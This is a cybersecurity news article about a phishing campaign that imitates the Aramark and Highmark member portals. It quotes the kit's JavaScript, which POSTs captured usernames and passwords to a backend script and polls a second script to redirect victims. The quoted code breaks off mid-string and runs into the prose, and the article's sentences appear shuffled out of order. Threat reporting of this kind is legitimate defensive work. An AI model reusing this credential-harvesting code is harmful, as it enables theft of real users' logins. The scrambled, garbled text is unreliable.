The campaign utilizes cloned login pages designed to harvest credentials through PHP-based phishing kits, with the attackers implementing server-side validation techniques to avoid detection by security tools and researchers. function getUpdatesSubmit() { localStorage.setItem("uname", document.getElementById("username").value); var xhr = new XMLHttpRequest(); xhr.open("POST", "xxx.php", true); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send("username=" + document.getElementById("username").value + "&password=" + document.getElementById("password").value); setInterval(function() { var request = new XMLHttpRequest(); request.open("GET", "check.php", true); request.onload = function() { if (request.responseText == "success") { window.location = "./verify/"; } else if (request.responseText == "error") { alert("Invalid credentials. The phishing sites operate behind specific paths such as “/online” directories, with root domain access resulting in 403 Forbidden errors—a tactical decision likely intended to limit unwanted attention from security scanners and researchers. Where earlier phishing kits performed client-side validation and redirects that were easily detectable, the current campaign has shifted credential checking to server-side operations, making analysis substantially more difficult and limiting visibility into the attack flow. More advanced variants include two-factor authentication phishing capabilities using a “getUpdates2fa()” function that captures one-time passwords with a “type = 3” parameter to differentiate OTP collection from initial credential theft. A sophisticated phishing campaign has been identified targeting employee and member portals of major organizations including Aramark, Highmark, and various healthcare providers. Rather than using client-side JavaScript to validate and redirect users after credential theft—a technique that leaves traces easily detectable by security tools—the new approach implements a polling mechanism to a backend script. These malicious sites are hosted on domains crafted to appear legitimate, such as “myinfoaramapay[.]com” impersonating Aramark’s MyAccess portal and “hignmarkedmemb[.]com” spoofing Highmark healthcare’s member portal. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Phishing pages are meticulously designed to mimic legitimate login interfaces, complete with company branding, identical layouts, and familiar user experiences. The script polls for three possible responses: “success” (redirecting to a verification page), “error” (displaying an alert about invalid credentials), or no response (continuing to poll silently).
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 16 Apr 2025 22:40:10 +0000